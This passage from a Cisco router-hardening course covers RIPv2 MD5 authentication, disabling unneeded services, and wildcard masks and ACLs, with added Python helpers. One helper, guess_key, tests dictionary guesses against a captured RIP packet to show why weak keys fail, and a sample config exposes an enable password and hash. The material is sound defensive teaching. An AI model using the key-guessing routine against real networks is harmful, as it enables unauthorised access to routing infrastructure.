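    changed how much the router trusts that source, worth noticing on a hardened router."""
    return [r for r in routes if r.code in DEFAULT_AD and r.ad != DEFAULT_AD[r.code]]


if __name__ == "__main__":
    routes = parse_show_ip_route(SAMPLE)
    same = [r for r in routes if str(r.prefix) == "172.18.0.0/16"]
    print("172.18.0.0/16 installed from:", install(same).code)
    print("172.18.5.5 forwarded via:", lookup(build_table(routes), "172.18.5.5").nexthop)
```

The two selection steps are deliberately separate functions: administrative distance and metric decide which of several competing routes to a prefix gets into the table, and longest prefix match decides which installed route a given packet follows. unexpected_distance is the quick check to run after someone else has had the enable prompt.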

In these fragments, RIP routing has been configured with the networks that each router can reach. For example, the LEFT router will announce that if there is a packet destined for network 172.16.0.0, then the other routers should send it to the LEFT router.

TASK 5B-2

Viewing a RIP Capture

Setup: You are logged on to Windows 2000 as the renamed Administrator account, and Network Monitor is running.

Because RIP is broadcast-based, any host on a segment where RIP broadcasts are sent can receive the update. Only the router has a legitimate routing function, but an attacker can learn valuable information, such as the configuration and addressing of a network.

1. Open rip update.cap, another capture file located on your course CD-ROM, in the \085545\Data\Captures folder.
2. Expand frame one, and observe the contents of the packet.
3. Look for the destination address of the packet. Find the IP and MAC destination addresses.
4. Observe the source address. You can conclude that this is likely the source address of a router in the network.
5. Expand the RIP portion of the frame capture.
6. Examine the network details sent in the packet. Even though you are a random user on the network, you have captured the packet and are able to learn quite a few things about the network in a very short amount of time.

RIPv2

In order to address some of the issues associated with RIP, RIPv2 was introduced. A security advantage was the ability to require authentication for RIP updates. From a networking perspective, the configuration is very similar to RIPv1, as shown previously. The following configuration fragments show the same three routers configured to use RIPv2 instead of RIPv1:

LEFT#configure terminal
LEFT(config)#router rip
LEFT(config-router)#version 2
LEFT(config-router)#network 172.16.0.0
LEFT(config-router)#network 192.168.20.0
LEFT(config-router)#^Z
LEFT#

RIGHT#configure terminal
RIGHT(config)#router rip
RIGHT(config-router)#version 2
RIGHT(config-router)#network 172.18.0.0
RIGHT(config-router)#network 192.168.10.0
RIGHT(config-router)#^Z
RIGHT#

CENTER#configure terminal
CENTER(config)#router rip
CENTER(config-router)#version 2
CENTER(config-router)#network 172.17.0.0
CENTER(config-router)#network 192.168.10.0
CENTER(config-router)#network 192.168.20.0
CENTER(config-router)#^Z
CENTER#

The authentication used is a key and MD5. The following configuration fragment shows the setup of RIPv2 authentication. In this fragment, first each interface that exchanges RIP updates is told that RIP authentication is required, in MD5 mode, using key chain 3; then the key chain and its key (the word strongpassword) are created. Keep in mind that MD5 authentication only lets a router reject updates from a peer that does not hold the key; the updates themselves still travel in the clear, as the next task shows, and the key string should be long and random rather than a dictionary word.

Router#configure terminal
Router(config)#interface ethernet0
Router(config-if)#ip rip authentication key-chain 3
Router(config-if)#ip rip authentication mode md5
Router(config-if)#exit
Router(config)#interface serial0
Router(config-if)#ip rip authentication key-chain 3
Router(config-if)#ip rip authentication mode md5
Router(config-if)#exit
Router(config)#interface serial1
Router(config-if)#ip rip authentication key-chain 3
Router(config-if)#ip rip authentication mode md5
Router(config-if)#^Z
Router#configure terminal
Router(config)#key chain 3
Router(config-keychain)#key 1
Router(config-keychain-key)#key-string strongpassword
Router(config-keychain-key)#^Z
Router#

All routers that exchange routing updates on the same network must use the same configuration (mode, key number, and key string), so the authentication will match. Once the router is configured, if you were to enter the show running-config command, you would see the following new pieces in the output. Note that the key string is stored in clear text in the configuration, so access to the configuration itself must be protected:

enable secret 5 $1$v13S$Nk8zY5NcYor5VvAfcfZCn0
enable password 2501
!
!
key chain 3
 key 1
  key-string strongpassword
!
interface Ethernet0
 ip address 172.16.0.1 255.255.0.0
 ip rip authentication mode md5
 ip rip authentication key-chain 3
 no mop enabled
interface Serial0
 no ip address
 shutdown

TASK 5B-3

Viewing a RIPv2 Capture

Setup: You are logged on to Windows 2000 as the renamed Administrator account, and Network Monitor is running.

1. Open ripv2withAuthentication.cap, another capture file located on your course CD-ROM, in the \085545\Data\Captures folder.
2. Expand frame one, and observe the contents of the packet.
3. Look for the destination address of the packet. Find the IP and MAC destination addresses.
4. Observe the source address. You can conclude that this is likely the source address of a router in the network.
5. Expand the RIP portion of the frame capture.
6. Examine the network details sent in the packet.
7. Observe the addition of the Authentication portion of the capture and the additional fields not present in the RIPv1 packet.
8. Close Network Monitor.
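The two captures in Tasks 5B-2 and 5B-3 are on the course CD, but the same packets can be built and dissected in Python. The block below is an added example and is not part of the course material: it constructs a RIPv1 response and a RIPv2 response carrying the keyed-MD5 authentication entry of RFC 2082, parses them as any host on the broadcast segment could, verifies the digest with the key, and shows that one captured packet lets an eavesdropper test key guesses offline. The routes, the key (strongpassword, as in the configuration above), the key ID and the sequence number are constructed; vendors fill the length fields slightly differently, and the layout here follows the RFC.

```python
"""RIP update packets as they appear on the wire, as an added example.

Not the course CD capture: builds a RIPv1 response and a RIPv2 response that
carries the RFC 2082 keyed-MD5 authentication entry, parses both the way a
sniffer on the segment would, and checks the digest. Routes, key, key ID and
sequence number are constructed.
"""
import hashlib
import hmac
import ipaddress
import struct

RESPONSE = 2
AUTH_AFI = 0xFFFF      # address family value that marks an authentication entry
AUTH_KEYED_MD5 = 3     # authentication type from RFC 2082
TRAILER_TAG = 1        # marks the trailer entry that carries the digest
KEY_LEN = 16


def _ip(text):
    return ipaddress.IPv4Address(text).packed


def ripv1_response(routes):
    """routes: [(network, metric)]. RIPv1 carries no mask, tag or next hop."""
    pkt = struct.pack("!BBH", RESPONSE, 1, 0)
    for net, metric in routes:
        pkt += struct.pack("!HH4s4s4sI", 2, 0, _ip(net), b"\0" * 4, b"\0" * 4, metric)
    return pkt


def _digest(pkt_through_trailer_header, key):
    """Keyed MD5: the zero-padded key stands where the digest will be written."""
    padded = key.encode()[:KEY_LEN].ljust(KEY_LEN, b"\0")
    return hashlib.md5(pkt_through_trailer_header + padded).digest()


def ripv2_response(routes, key, key_id=1, seq=1):
    """routes: [(network, mask, metric)]. The first entry is the auth header, the
    RTEs follow, and the trailer (0xFFFF, 0x0001, 16-byte digest) closes the packet."""
    header = struct.pack("!BBH", RESPONSE, 2, 0)
    body = b"".join(struct.pack("!HH4s4s4sI", 2, 0, _ip(n), _ip(m), b"\0" * 4, met)
                    for n, m, met in routes)
    pkt_len = len(header) + 20 + len(body)   # header + auth entry + RTEs; trailer excluded
    auth = struct.pack("!HHHBBI8s", AUTH_AFI, AUTH_KEYED_MD5, pkt_len,
                       key_id, KEY_LEN, seq, b"\0" * 8)
    pkt = header + auth + body + struct.pack("!HH", AUTH_AFI, TRAILER_TAG)
    return pkt + _digest(pkt, key)


def parse_rip(pkt):
    """Returns (command, version, auth info or None, routes). Route entries are readable
    whether or not the packet is authenticated: MD5 authenticates, it does not hide."""
    cmd, version, _ = struct.unpack("!BBH", pkt[:4])
    auth, routes, pos = None, [], 4
    while pos + 20 <= len(pkt):
        afi, tag = struct.unpack("!HH", pkt[pos:pos + 4])
        if afi == AUTH_AFI and tag == TRAILER_TAG:
            break                                   # digest follows; located via pkt_len
        if afi == AUTH_AFI and tag == AUTH_KEYED_MD5:
            pkt_len, key_id, dlen, seq = struct.unpack("!HBBI", pkt[pos + 4:pos + 12])
            auth = {"type": "keyed-md5", "key_id": key_id, "seq": seq, "pkt_len": pkt_len,
                    "digest": pkt[pkt_len + 4:pkt_len + 4 + dlen]}
        else:
            ip, mask, _, metric = struct.unpack("!4s4s4sI", pkt[pos + 4:pos + 20])
            routes.append({"net": str(ipaddress.IPv4Address(ip)),
                           "mask": str(ipaddress.IPv4Address(mask)), "metric": metric})
        pos += 20
    return cmd, version, auth, routes


def verify_md5(pkt, key):
    """True when `key` reproduces the digest over the packet (RTEs, sequence number and all)."""
    _, _, auth, _ = parse_rip(pkt)
    if auth is None or len(auth["digest"]) != KEY_LEN:
        return False
    return hmac.compare_digest(_digest(pkt[:auth["pkt_len"] + 4], key), auth["digest"])


def guess_key(pkt, candidates):
    """An eavesdropper with one packet can test key guesses offline; first match or None."""
    return next((k for k in candidates if verify_md5(pkt, k)), None)


if __name__ == "__main__":
    v2 = ripv2_response([("172.16.0.0", "255.255.0.0", 1)], key="strongpassword", seq=7)
    print(parse_rip(v2))
    print("verifies:", verify_md5(v2, "strongpassword"),
          "guessed:", guess_key(v2, ["cisco", "strongpassword"]))
```

Two points from the parse are worth keeping. Authenticated updates still carry every network and mask in the clear, which is why step 6 of Task 5B-3 can still examine the network details. And because the digest is MD5 over the packet plus the key, a weak key string falls to a dictionary test against a single captured packet, with no further traffic to the router; the key chain needs a long random string, not a word.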

Topic 5C
Removing Protocols and Services

The fundamental concept of hardening the router is no different than hardening Linux or Windows. You must remove all of the protocols and services that are unused. You must configure the required protocols and services so that they are secured for access. In this topic, you will look at removing many of the protocols and services that are often not used on a router, and continue to harden the device.

CDP

The Cisco Discovery Protocol (CDP) is a protocol used by Cisco devices to exchange information, such as platform information and status, with each other. In general, CDP can be a useful thing when troubleshooting in a simple environment. Unfortunately, like most things that make our lives as administrators a little easier, CDP can make an attacker's job a little easier too, because it gives out important information such as the IOS version that the router is running. And, of course, knowing what IOS version is running makes an attacker's job much easier, since he or she will have a much better idea of what exploits will work against such a target. CDP is sent as an unauthenticated Layer Two multicast, so any host on the segment can read it.

In the following configuration fragment, you can see that turning off CDP for the entire router is not a complex set of commands; only two commands are required:

Router#config terminal
Router(config)#no cdp run
Router(config)#^Z
Router#

However, it may be desirable to stop CDP only on those interfaces that are not connected directly to another router. Perhaps there is only a direct link between two serial interfaces, and you want to allow CDP to run there, but not on the internal Ethernet network. In the following configuration fragment, CDP is disabled just for the Ethernet interface. Note that the only addition is the selection of the interface, and the command is no cdp enable instead of no cdp run:

Router#config terminal
Router(config)#interface Ethernet 0
Router(config-if)#no cdp enable
Router(config-if)#^Z
Router#

TASK 5C-1

Turning Off CDP

1. Create the configuration fragment that you would use for turning off CDP on Ethernet 0, Ethernet 1, and Serial 1.

Router#config terminal
Router(config)#interface Ethernet 0
Router(config-if)#no cdp enable
Router(config-if)#interface Ethernet 1
Router(config-if)#no cdp enable
Router(config-if)#interface Serial 1
Router(config-if)#no cdp enable
Router(config-if)#^Z
Router#

ICMP

ICMP provides, among other functions, the ability to use the often-required ping and traceroute commands. However, ICMP has become one of the most misused of all protocols. DoS and DDoS attacks use ICMP, and more and more attacks take advantage of this function of the network. In this section, only a few examples of hardening ICMP are discussed.

traceroute: An operation of sending trace packets for determining information; traces the route of UDP packets for the local host to a remote host. Normally traceroute displays the time and location of the route taken to reach its destination.

ICMP Directed Broadcast

Smurf is an attack that takes advantage of ICMP. Specifically, what Smurf does is get many machines to flood a single host with ICMP packets, effectively shutting down that host. The attack works by pinging the broadcast address of an entire network, using a spoofed source IP address. When every host on the network replies to the spoofed address, that machine has been attacked. This can easily lead to hundreds of machines responding to a host simultaneously. The router stops its own networks from being used as the amplifier by refusing to forward directed broadcasts.

The following configuration fragment shows the disabling of directed broadcasts on the Serial 1, Serial 0, and Ethernet 0 interfaces. To protect fully against this attack, you should turn off directed broadcasts like this on all interfaces. (On IOS 12.0 and later this is the default, but verifying it costs nothing.)

Router#config terminal
Router(config)#interface Ethernet 0
Router(config-if)#no ip directed-broadcast
Router(config-if)#interface Serial 0
Router(config-if)#no ip directed-broadcast
Router(config-if)#interface Serial 1
Router(config-if)#no ip directed-broadcast
Router(config-if)#^Z
Router#

ICMP Unreachable

Another very common attack is for a potential intruder to scan your system(s) looking for services that are open and that can be exploited. It is common to use ICMP to perform these scans of systems. If you remove the ICMP Unreachable message, be aware that your system will not respond with desired unreachable messages either, such as when your internal users legitimately need them, for example during timeouts. In particular, the "fragmentation needed" message is an unreachable, so Path MTU Discovery through that interface breaks when unreachables are suppressed; the command affects only the messages the router itself generates, not unreachables it forwards. The following configuration fragment shows the disabling of ICMP Unreachable messages on the Serial 0 interface. To remove ICMP Unreachable messages on the entire router, this command needs to be entered for each interface.

Router#config terminal
Router(config)#interface Serial 0
Router(config-if)#no ip unreachables
Router(config-if)#^Z
Router#

TASK 5C-2

Hardening ICMP

1. Create the configuration fragment that you would use to disable ICMP Directed Broadcasts and ICMP Unreachable messages on the entire router, which has the Ethernet 0, Serial 0, and Serial 1 interfaces.

Router#config terminal
Router(config)#interface Ethernet 0
Router(config-if)#no ip directed-broadcast
Router(config-if)#no ip unreachables
Router(config-if)#interface Serial 0
Router(config-if)#no ip directed-broadcast
Router(config-if)#no ip unreachables
Router(config-if)#interface Serial 1
Router(config-if)#no ip directed-broadcast
Router(config-if)#no ip unreachables
Router(config-if)#^Z
Router#

Source Routing

A feature that was added to routers to increase the control administrators had over the network was source routing. This feature has become a vulnerability that attackers now use. Source routing allows a packet to dictate the path it should take through a routed network; such a packet does not follow the routing tables built by the routing protocols. This may allow an attacker to bypass critical systems, such as a firewall or an IDS. In most situations, there is no need for source routing to be allowed on any router. The configuration fragment that follows shows the disabling of the source routing service:

Router#config terminal
Router(config)#no ip source-route
Router(config)#^Z
Router#

Small Services

TCP and UDP small services are enabled by default on some routers (generally IOS 11.3 and previous versions). Small services are not often used anymore and include echo, discard, daytime, and chargen. They reveal nothing an attacker needs to learn, but they are a ready source of amplification: the UDP echo and chargen ports in particular can be abused to bounce traffic between hosts in a loop. On all routers, be sure to disable these services. The configuration fragment that follows shows the disabling of small services for both TCP and UDP:

Router#config terminal
Router(config)#no service tcp-small-servers
Router(config)#no service udp-small-servers
Router(config)#^Z
Router#

Small services are also known as small servers.

Finger

Finger is another older service that is rarely used in modern networks. The Finger service is used to find information about users who are logged in to a router. On older versions of the IOS (11.2 and older), Finger is disabled by using the no service finger command. On newer versions of the IOS (11.3 and newer), Finger is disabled by using the no ip finger command. In the following code, the first configuration fragment shows the removal of the Finger service from an older router, and the second fragment shows the removal of the Finger service from a newer router:

Router#config terminal
Router(config)#no service finger
Router(config)#^Z
Router#

Router#config terminal
Router(config)#no ip finger
Router(config)#^Z
Router#

Remaining Services

As a security professional, you know that hardening a piece of equipment means disabling or removing all of the services and protocols that you are not using. In this section, you will see several other services that you should consider disabling on your router. In consideration of space, every service and protocol cannot be listed in this section; only several of the significant services can be highlighted.

The BootP service is used to remotely boot computers via the network. This service can be disabled by using the no ip bootp server command.

The DNS lookup function is enabled on Cisco routers, but by default there is no defined name server. The net result is that the router broadcasts all DNS requests. To stop the router from resolving names at all, use the no ip domain-lookup command; no ip name-server removes any name servers that were configured.

The Network Time Protocol (NTP) is used for time synchronization on the network. If the router does not use NTP, the service can be disabled by using the no ntp server command. If you want to disable this protocol for only a single interface, the command to use is ntp disable, when you are in Interface Mode.

When NTP is used in conjunction with syslog services, thus keeping accurate timestamps on log entries, it can be useful for forensic purposes. For that reason, a common choice is to keep NTP but restrict it, so that the router synchronizes only from known servers and does not answer NTP queries on untrusted interfaces.

The Simple Network Management Protocol (SNMP) is used to communicate management information between network devices. SNMP left as-is on routers can provide information about the router to attackers, and with a weak or well-known community string it can allow the configuration to be read or even changed. Disable SNMP by using the no snmp-server command.

HTTP is used on some versions of the routers to allow for remote access and management. Unless specifically required in your organization, this should be disabled. To disable HTTP, use the no ip http server command.

The configuration fragment that will disable all of the above services will look like this:

Router#config terminal
Router(config)#no ip bootp server
Router(config)#no ip domain-lookup
Router(config)#no ip name-server
Router(config)#no ntp server
Router(config)#no snmp-server
Router(config)#no ip http server
Router(config)#^Z
Router#

TASK 5C-3
Removing Unneeded Services

1. Create the configuration fragment that you would use to remove the following services from the whole IOS v12.x router: CDP, IP directed broadcasts, small servers, source routing, and finger. For this exercise, you can assume that the interfaces are named E0, S0, and S1.

Router#config terminal
Router(config)#no cdp run
Router(config)#interface Ethernet 0
Router(config-if)#no ip directed-broadcast
Router(config-if)#interface Serial 0
Router(config-if)#no ip directed-broadcast
Router(config-if)#interface Serial 1
Router(config-if)#no ip directed-broadcast
Router(config-if)#^Z
Router#
Router#config terminal
Router(config)#no service tcp-small-servers
Router(config)#no service udp-small-servers
Router(config)#no ip source-route
Router(config)#no ip finger
Router(config)#^Z
Router#

Directed broadcasts are an interface-level setting, so every interface must be covered; the remaining commands are global and are entered once.
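The fragments above are easy to type once and hard to verify across many routers. The following Python script, added here as an example and not part of the course material, audits a saved running-config for the services this topic says to disable. The rule table, the defaults assumed for services that leave no line in the configuration when they are in their default state, and the sample configuration are all constructed for the example; defaults vary by IOS release, so check them against yours.

```python
import re

# Added example, not course code: audit an IOS running-config for the services
# Topic 5C says to disable. Each rule is (pattern that shows the service off,
# pattern that shows it explicitly on, state assumed when neither line exists).
# The assumed defaults are an assumption about the IOS release; verify them.
GLOBAL_RULES = {
    "bootp":        (r"^no ip bootp server",           r"^ip bootp server",              True),
    "dns-lookup":   (r"^no ip domain[ -]lookup",       r"^ip domain[ -]lookup",          True),
    "http":         (r"^no ip http server",            r"^ip http server",               True),
    "snmp":         (r"^no snmp-server$",              r"^snmp-server (community|host)", False),
    "cdp":          (r"^no cdp run",                   r"^cdp run",                      True),
    "tcp-small":    (r"^no service tcp-small-servers", r"^service tcp-small-servers",    False),
    "udp-small":    (r"^no service udp-small-servers", r"^service udp-small-servers",    False),
    "source-route": (r"^no ip source-route",           r"^ip source-route",              True),
    "finger":       (r"^no (ip|service) finger",       r"^(ip|service) finger",          False),
    "ntp":          (r"^no ntp",                       r"^ntp (server|peer|master)",     False),
}


def global_lines(config):
    """Top-level statements of a running-config (interface sub-commands are indented)."""
    return [l.strip() for l in config.splitlines() if l and not l.startswith((" ", "!"))]


def interface_blocks(config):
    """Map each 'interface X' stanza to the list of its indented sub-commands."""
    blocks, current = {}, None
    for line in config.splitlines():
        if line.startswith("interface "):
            current = line.split(None, 1)[1].strip()
            blocks[current] = []
        elif current is not None and line.startswith(" "):
            blocks[current].append(line.strip())
        else:
            current = None        # '!' or the next global statement ends the stanza
    return blocks


def audit_config(config, directed_broadcast_default_on=True):
    """Return {service: True if the service is (still) enabled}."""
    lines = global_lines(config)
    state = {}
    for name, (off_re, on_re, default_on) in GLOBAL_RULES.items():
        if any(re.match(off_re, l) for l in lines):
            state[name] = False
        elif any(re.match(on_re, l) for l in lines):
            state[name] = True
        else:
            state[name] = default_on
    # Directed broadcasts are set per interface, so every stanza is checked.
    for ifname, cmds in interface_blocks(config).items():
        key = "directed-broadcast:" + ifname
        if "no ip directed-broadcast" in cmds:
            state[key] = False
        elif "ip directed-broadcast" in cmds:
            state[key] = True
        else:
            state[key] = directed_broadcast_default_on
    return state


def still_enabled(config, **kwargs):
    """Names of services the hardening checklist would still flag, sorted."""
    return sorted(k for k, on in audit_config(config, **kwargs).items() if on)


# Constructed sample config for the example; not captured from a real router.
SAMPLE_CONFIG = """\
version 12.2
service timestamps log datetime msec localtime show-timezone
no service tcp-small-servers
no service udp-small-servers
hostname Router
!
ip http server
no ip domain-lookup
no ip source-route
snmp-server community public RO
!
interface Ethernet0
 ip address 192.168.10.1 255.255.255.0
 no ip directed-broadcast
!
interface Serial0
 ip address 10.20.30.50 255.255.255.0
!
no ip bootp server
no cdp run
"""

if __name__ == "__main__":
    print("still enabled:", still_enabled(SAMPLE_CONFIG))
```

Run it against the output of show running-config saved to a file. The services this kind of check catches most often are the ones that are on by default and leave no line in the configuration while they are on (CDP, and directed broadcasts on older releases), because nothing in the config announces them.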

Lesson 5: Routers and Access Control Lists

Topic 5D
Creating Access Control Lists

Access Control Lists (ACLs) enable network administrators not only to control access from a security standpoint, but also to restrict bandwidth use on critical links. In this and the following topic, the discussion will be on IP access lists, but be aware that access lists can exist for other routed protocols, such as AppleTalk and IPX/SPX.

An ACL is a packet filter that compares a packet with a given set of criteria. The ACL checks the packet and acts upon it as defined by the list. Access Control Lists are divided into two main categories, standard and extended. Standard ACLs look only at the source address of a packet received by the router. The result of the list is to either permit or deny the packet based on the host, subnet, or network address. A standard access list takes effect for the full IP protocol stack: it cannot distinguish, say, Telnet from HTTP coming from the same source.

Extended ACLs look at both the source and destination packet addresses. Not limited to the source IP address, extended lists also allow checking of the protocol, port numbers, and destination address. This additional flexibility is the reason that many administrators implement extended lists on their networks.

packet filter: Inspects each packet for user-defined content, such as an IP address, but does not track the state of sessions. This is one of the least secure types of firewall.

Access Control List Operation

The function of an access list is the same internally in the router, whether it is a standard list or an extended list. For an outgoing list, the process begins as it would on a router with no access lists. First, as the packet enters the router, the routing table is checked. If there is no route, the packet is discarded and a message may be returned to the sender (such as an ICMP destination unreachable message). If the packet is routable, the router next checks whether the interface that will route the packet has an access list defined. If there is no list, the packet is routed out the appropriate interface. If there is a list defined, the packet is checked against the list to decide whether it is to be permitted or dropped. An incoming list is checked earlier, as the packet arrives on its interface and before the routing lookup, so a packet it denies never reaches the routing table.

Figure 5-13 illustrates this process. A packet is taken in via Interface E0. In this example, the packet is incoming on Interface Ethernet 0 and destined to be outgoing on Interface Ethernet 1. Because the list is used to determine whether or not the packet is to exit on Interface Ethernet 1, this is an outgoing list.

Figure 5-13: The Access Control List process.

A critical point about access lists is that they operate in sequence, from the top down. In other words, the first statement of the access list is checked. If the packet does not match the criteria of that statement, the packet is compared with the next statement, and so on, until there is a match. Once there is a match, the packet follows that rule and no further statements are examined. If two rules could apply to the same packet, whichever rule the packet hits first is the one it follows, so specific statements must be placed before general ones.

There will always be a match, since the end of every access list is an implicit deny. This means that every list must have at least one permit statement, or all packets will be denied! Figure 5-14 shows a graphical example of the access list statement process.

Figure 5-14: The list process of an ACL.
The Wildcard Mask

IP access lists use a value known as the wildcard mask to determine whether or not a packet matches a given stat statement in the list. The wildcard mask uses 1s and 0s to identify which bits of the IP address(es) are compared for permission or denial.

Wildcard masks are 32-bit values that look like traditional subnet masks, but they do not function in the same manner. A wildcard mask uses its 1s and 0s to select which bits of an IP address are compared. The rules are as follows. If the wildcard mask bit is a 1, the corresponding bit of the IP address is not checked for a match. If the wildcard mask bit is a 0, the corresponding bit of the IP address is checked for a match.

The chart in Figure 5-15 shows several examples of the wildcard mask checking options. Where there is a 0, the values are checked for a match, and where there is a 1, the value is not checked.

Figure 5-15: Examples of wildcard masks.

As you can see from this chart, if an octet of the mask were 11111111, then none of the eight bits of the corresponding octet of the IP address would be checked. Likewise, if an octet of the wildcard mask were 00000000, then all eight bits of the corresponding octet would be checked. For an ordinary contiguous network, the wildcard mask is simply the subnet mask with every bit inverted, which is the same as subtracting each octet of the subnet mask from 255.

Wildcard Mask Examples

If the goal is to have an access list statement match an entire network, the following wildcard mask could be used.

Item            Value
IP Network      10.15.10.0
Subnet Mask     255.255.255.0
Wildcard Mask   0.0.0.255

This tells the router to check only the first 24 bits of the IP address, and if the decimal value of those bits is 10.15.10, then this access list statement applies to the packet. Every host on 10.15.10.0/24 matches.

If the goal is to match a specified subnet, the mask requires a bit more calculation, but still functions the same way. If the administrator wants subnet 10.15.10.32 (subnet mask 255.255.255.224) to match an access list statement, the mask would be as follows.

Item               Value
IP Subnet Address  10.15.10.32
Subnet Mask        255.255.255.224
Wildcard Mask      0.0.0.31

This tells the router to check all but the last five bits of the fourth octet. If the checked bits equal those of 10.15.10.32, then the access list statement applies to the packet; hosts 10.15.10.32 through 10.15.10.63 match.

If an administrator wanted to have an access list statement match a single host in a network, the following wildcard mask could be used.

Item           Value
IP Address     10.15.10.187
Subnet Mask    255.255.255.0
Wildcard Mask  0.0.0.0

This tells the router to check every bit of the IP address, and if those bits are 10.15.10.187, then this access list statement applies to this host. Note that the subnet mask of the host's network does not enter into it: a single host is always matched with the wildcard 0.0.0.0.

TASK 5D-1
Creating Wildcard Masks

1. If your goal is to block out a single host, such as 192.168.27.93, that uses 255.255.255.0 as the subnet mask, what wildcard mask would you use?
0.0.0.0. The subnet mask is irrelevant for a single host; 0.0.0.255 would match every host on 192.168.27.0/24.

2. If your goal is to block out a subnet of 10.12.24.0 that uses 255.255.248.0 as the subnet mask, what wildcard mask would you use?
0.0.7.255.

3. If your goal is to block out network 172.168.32.0 that uses 255.255.255.0 as the subnet mask, what wildcard mask would you use?
0.0.0.255.
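The following Python functions, added here as an example and not part of the course material, do the wildcard arithmetic for the cases above and in Task 5D-1, and apply the same bitwise test that the router applies to each statement. They also show why the subnet mask of a host's network has no bearing on the wildcard for that single host.

```python
# Added example, not course code: wildcard-mask arithmetic for the cases worked
# in the text and in Task 5D-1. All functions take dotted-decimal strings.

def to_int(dotted):
    """'10.15.10.32' -> 32-bit integer."""
    return int.from_bytes(bytes(int(octet) for octet in dotted.split(".")), "big")


def to_dotted(value):
    """32-bit integer -> dotted-decimal string (negative values are masked to 32 bits)."""
    return ".".join(str(b) for b in (value & 0xFFFFFFFF).to_bytes(4, "big"))


def wildcard_from_subnet_mask(mask):
    """Invert every bit: 255.255.255.224 -> 0.0.0.31. Works for any mask, contiguous or not."""
    return to_dotted(~to_int(mask))


def wildcard_from_prefix(prefix_len):
    """/21 -> 0.0.7.255: the low (32 - prefix_len) bits are 'do not check'."""
    return to_dotted((1 << (32 - prefix_len)) - 1)


def matches(address, network, wildcard):
    """True when every bit the wildcard marks with 0 agrees between address and network.
    This is exactly the comparison the router makes for one access-list statement."""
    return (to_int(address) ^ to_int(network)) & ~to_int(wildcard) & 0xFFFFFFFF == 0


def hosts_matched(wildcard):
    """How many addresses a statement with this wildcard can match: 2 ** (bits set)."""
    return 1 << bin(to_int(wildcard)).count("1")


def match_range(network, wildcard):
    """Lowest and highest address matched, for a contiguous wildcard."""
    base = to_int(network) & ~to_int(wildcard) & 0xFFFFFFFF
    return to_dotted(base), to_dotted(base | to_int(wildcard))


if __name__ == "__main__":
    for mask in ("255.255.255.0", "255.255.255.224", "255.255.248.0", "255.255.255.255"):
        print(mask, "->", wildcard_from_subnet_mask(mask))
    print(match_range("10.15.10.32", "0.0.0.31"))
```

The router ignores the bits of the network address that the wildcard marks with a 1, which is why match_range zeroes them before reporting the range, and why a non-contiguous wildcard such as 0.0.1.0 (match every other /24) is legal even though no subnet mask corresponds to it.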

Topic 5E
Implementing Access Control Lists

In this topic, we will detail the implementation of and rule creation for access lists. There will be examples of access lists and their syntax on a Cisco router. Examples will include both standard and extended IP access lists, the most common lists for networks connected to the Internet today. Access Control Lists are implemented in two stages on Cisco routers. The first stage is to create the list, including all of its statements. The second stage is to apply the list to an interface of the router, defining whether the list is to filter packets as an inbound or an outbound list. A list that has been created but not applied to an interface filters nothing.

Although you have the option of using standard or extended access lists, extended lists are generally preferred because they provide more granularity when you are permitting and denying traffic.

Standard Access Control List Command Syntax

To create a standard ACL, the following line shows the proper syntax. The items access-list-number, source and source-mask are variables to be filled in; the rest is typed as shown.

Router(config)#access-list access-list-number {permit|deny} source [source-mask]

Where:
access-list is the actual command to create a list.
access-list-number is a value between 1 and 99; choosing a number in this range is what makes the list a standard ACL.
permit|deny is the value that defines whether the statement grants or blocks access.
source is the source address to match.
source-mask is the wildcard mask for the defined host or network. If it is omitted, 0.0.0.0 is assumed, so only that single host matches.

Once the list has been created, the second stage is to apply the list to an interface. Before you do this, make sure that you have entered Interface Configuration Mode for the interface that you want to be affected by the list. The syntax for list application is shown here; again, access-list-number is a variable to be filled in.

Router(config-if)#ip access-group access-list-number {in|out}

Where:
ip access-group is the command to link (implement) a list to an interface.
access-list-number is the value assigned to the list to be implemented on this interface.
in|out is the value that defines whether the list filters inbound or outbound packets on that interface.

Extended Access Control List Syntax

To create an extended ACL, the following line shows the proper syntax. As before, access-list-number, protocol, source, source-mask, destination, destination-mask, operator and operand are variables to be filled in.

Router(config)#access-list access-list-number {permit|deny} protocol source source-mask destination destination-mask [operator operand]

Where:
access-list is the actual command to create a list.
access-list-number is a value between 100 and 199; choosing a number in this range is what makes the list an extended ACL.
permit|deny is the value that defines whether the statement grants or blocks access.
protocol is the value that defines what protocol to filter, such as ip, tcp, udp, or icmp.
source is the value that defines the source IP address.
source-mask is the value that defines the wildcard mask for the source.
destination is the value that defines the destination IP address.
destination-mask is the value that defines the wildcard mask for the destination.
operator operand is an optional port test for TCP or UDP; the operand is the port number and the operator is one of:
GT, greater than
LT, less than
EQ, equal to
NEQ, not equal to
A port test may follow the source or the destination; the examples in this topic test the destination port.

The keyword any may be used in place of an address 0.0.0.0 with mask 255.255.255.255, and host followed by an address in place of that address with mask 0.0.0.0.

Once the list has been created, the second stage is to apply it to an interface, exactly as for a standard list:

Router(config-if)#ip access-group access-list-number {in|out}

Figure 5-16: A sample network for ACL implementation.

Use Figure 5-16, with the network and host IP addresses defined, to look at several examples of access lists. The same figure will be used for all examples, only with different lists, different goals, and different implementations. These examples use both standard and extended IP access lists.

Denial of a Specific Host

Our first example is the simple denial of a defined host into the router. This can be accomplished with a standard ACL. The configuration fragment for this example is:

Router#configure terminal
Router(config)#access-list 23 deny 192.168.10.7 0.0.0.0
Router(config)#access-list 23 permit 0.0.0.0 255.255.255.255
Router(config)#interface Ethernet 0
Router(config-if)#ip access-group 23 in
Router(config-if)#^Z
Router#

The third line permits all traffic not denied by the second line. The word any can be used in place of 0.0.0.0 255.255.255.255.

Denial of a Subnet

Our second example is the denial of a defined host out to the Internet and the denial of an entire network to the Internet. This can also be accomplished with a standard ACL. The configuration fragment for this example is:

Router#configure terminal
Router(config)#access-list 45 deny 192.168.10.7 0.0.0.0
Router(config)#access-list 45 deny 192.168.20.0 0.0.0.255
Router(config)#access-list 45 permit 0.0.0.0 255.255.255.255
Router(config)#interface Serial 0
Router(config-if)#ip access-group 45 out
Router(config-if)#^Z
Router#

The fourth line permits all traffic not denied by the second and third lines.

Denial of a Network

Our third example is the denial of an entire network from another network. This can be accomplished with a standard ACL. The configuration fragment for this example is:

Router#configure terminal
Router(config)#access-list 57 deny 192.168.20.0 0.0.0.255
Router(config)#access-list 57 deny 192.168.10.0 0.0.0.255
Router(config)#access-list 57 permit 0.0.0.0 255.255.255.255
Router(config)#interface Ethernet 0
Router(config-if)#ip access-group 57 out
Router(config-if)#interface Ethernet 1
Router(config-if)#ip access-group 57 out
